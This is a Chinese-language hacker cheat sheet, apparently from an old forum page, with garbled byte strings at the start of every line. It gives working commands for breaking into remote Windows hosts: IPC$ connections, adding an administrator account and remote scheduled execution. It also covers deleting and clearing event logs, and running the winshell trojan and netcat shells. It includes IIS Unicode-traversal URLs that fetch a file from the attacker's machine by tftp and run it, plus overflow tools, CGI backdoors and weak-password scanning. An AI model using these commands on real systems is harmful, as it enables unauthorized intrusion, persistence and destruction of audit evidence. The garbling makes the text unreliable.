网管和黑客都必须知道的命令
�6@N,'a�8r 常用的几条NET命令:
�@{y'_fw�� op6]"ZV�-C (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
]�,]Rv�#�` fkx�kf�^g) (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
1��q}L��O2 >f�BPVu\PA (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
OI�b�l�BQ! Lw�>��B:3e (查看远程主机时间) net time \\IP地址
[6!�k:�-t+ $R�m~ VwY# (定时启动某个程序) at \\IP地址 02:18 readme.exe
F�w<"]*iu -b-a2�1,m> (查看共享) net view \\IP地址
*S;�}&VAZ� ��7�>���yd (查看netbios工作组列表) nbtstat -A IP地址
��+A3/^�C0 yYCS��-rF> (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
�'�UhoKb_p 8M5)fDu*�? (这两条把自己增加到管理员组): net user 用户名 密码 /add
Ydh�Tjv�x� r[L.TX3Ah= net localgroup Administrators 用户名 /add
9Dx~!���( *qpu!z2m|| (断开连接) net use \\IP地址\ipc$ /delete
��u[GZ��~L [3Q0KCZ�0( 扫尾:
Af|h*V4�Xu FZ-�Wgh
0z del C:\winnt\system32\logfiles\*.*
���=6sP`�: �7[�m+r:y del C:\winnt\ssytem32\config\*.evt
�0+>�g/��> 7'\.�Q�J!< del C:\winnt\system32\dtclog\*.*
'Ea3(OsuXn fCY�|iO0.t del C:\winnt\system32\*.log
�#w{�`6�}p P�x_8lB/;� del C:\winnt\system32\*.txt
gT)(RS`_) lJ�K]S=c�d del C:\winnt\*.txt
t�ia}��&9; Ic/hVKY�G5 del C:\winnt\*.log
�v$}�^$�8` a�q?bI:�>8 一、netsvc.exe
scV�%p&�{a ?@�"@9na�� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
xQFRM a�QE 5���{!� fa netsvc /list \\IP地址
r^�,_m,s'<
�4E''pW]8 netsvc schedule \\IP地址 /query
L=<��x�TbY �Th�ggas�, netsvc \\IP地址 schedule /start
/uw@o9`~2- 5U�?�O�1}P 二、OpenTelnet.exe
QV[&2&&^<< yX&#��
r�I 远程启动主机的Telnet服务,并绑定端口到7878,例如:
D2ggF�xqe� mI�lg=��8: OpenTelnet \\IP地址 用户名 密码 1 7878
?_]����Y8f LK h=jB^bT 然后就可以telnet到主机的7878端口,进入DOS方式下:
�ktU��:U�q ) �5�7'<� telnet IP地址 7878
[Me��ivrJ+ t�#(�Nf�zN 三、winshell.exe
st�w@@G�Q� 01n!T2;yW} 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
D�^r g-E[L �Z!v,�;M�W p Path (查看winshell主程序的路径信息)
@[^ 3y�C#� e��u(Fhs
� b reBoot (重新启动机器)
0]�>bNbLB" ~A0AB�
`�7 d shutDown (关闭机器)
�=-dnniKW4 =]@Bc��
7@ s Shell (执行后你就会看到可爱的“C:\>”)
Zr}>>aIJ]k amsl>��wc! x eXit (退出本次登录会话,此命令并不终止winshell的运行)
TXB!Y!R�G# Z�_ElLY��� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
\%r�#>8�c8 r'i9��9�~ 四、3389登陆器,GUI方式登录远程主机的
Rxy|Ag/I;V kH 9�k<��{ 五、elsave.exe
}�w�f�8y� sX?arI=�_U 事件日志清除工具
~D5
-G?%$" �}-[l)<F�: elsave -s \\IP地址 -l "application" -C
X��"Eqhl<t S��r�A6}kS elsave -s \\IP地址 -l "system" -C
a�s:=��QMV e�i�2?H;H; elsave -s \\IP地址 -l "security" -C
��DS8H�SSD orJ|Q3c)�d 执行后成功清除应用程序日志,系统日志,安全日志
hTB�J�\1
- ]Jz=.�F sO 六、hbulot.exe
`
k]�
TOc� �&t�O�o[U? 开启win2kserver和winxp的3389服务
9�^X�ndo]y +9HU&g�Q�3 hbulot [/r]
��U'jmgHq� �-�n:2US�< 使用/r表示安装完成后自动重起目标使设置生效。
%[n�5mF*`� (0`rfYv5.R 七、nc.exe(netcat.exe)
p�uOM�tCI #7fOH�
U8v 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
j��Hq+/\�� 1�=]#=)�+� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
�$b�p'b<jx D� u<�P^CE 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
!j�P�[=��� /8Lb�_QH�{ 参数:
!UzE�&CirV �/:�!�sn-( -e prog 程序重定向,一旦连接,就执行 [危险!!]
M��x}r!� Q ��@�!�$xSH -g gateway source-routing hop point[s], up to 8
,$]m1|t@�z +��^:uPW^U -G num source-routing pointer: 4, 8, 12, ...
u�fR|V-BWx I�lEU6Rs�
-h 帮助信息
[�<�+T�@"y �Q*1Av�y6] -i secs 延时的间隔
��li3X�}�� (fc�_V[(m" -l 监听模式,用于入站连接
;zqx�Dl��_ Vb 36R��_u -n 指定数字的IP地址,不能用hostname
65B&��>`H~ :MDFTw�~�| -o file 记录16进制的传输
d/NjY[`�5+ ^C,rN;mX'� -p port 本地端口号
F�UI/ �A�> ���Q8TR@0d -r 任意指定本地及远程端口
ruhC:rg:/ Fkv284,LM� -s addr 本地源地址
D[�T\_3�W L{sF�R^-G� -u UDP模式
HmXxM:�[4; �N�jo.-��k -v 详细输出——用两个-v可得到更详细的内容
�L `2{H%J` uT�oi4]w"y -w secs timeout的时间
aV� f�sF|, �9��Eh*r@> -z 将输入输出关掉——用于扫描时
25G~rklk� 八、TFTPD32.EXE
VU\G���4�9 B4O�FhtY�E 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
�}T%��E;m- �1�%�@i�4� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
g�C6Gm':�c y��F�o8�x[ 然后可以直接令文件运行:
a�;i}�<n7� =)#�X�Z[#F http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
B�"7~�[,he �ux�W� |&q 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
$�y)�tcVc� %PV��u��>^ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
MD�px@�.A, ][f��0ZMa� 一、一 Xscan命令行运行参数说明:
�J^��k�S�p -�6q7�ze{@ 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
BT:�b&"AR[ �_J�>Ik2EF 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
7x*L 1>[`' 9�8}l`�J=i xscan -file <主机列表文件名> <检测项目> [其他选项]
~���LH).\V Y(JZP\Tf_N 其中<检测项目> 含义如下:
L#V���e��[ T5[�(v��Tp -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
Ornm3%�p+e lz).=N}�m� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
P@e�tT8|�V V�2Z��^�W^ -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
��+5q�l�`C nCldH|>�5w -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�CJ�;D�&qo ~N2� ��[j� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
Gy��E�5jh2 dDe$<g�5L4 [其他选项] 含义如下:
+SFo2Wdr43 *�@
\LS�!N -v: 显示详细扫描进度
�Swv
=g�u [c>YK�N2qa -p: 跳过Ping不通的主机
��-P]�onD
O|;|7f�CB\ -o: 跳过没有检测到开放端口的主机
�:�2L�-Nf� P\�X$f��D -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
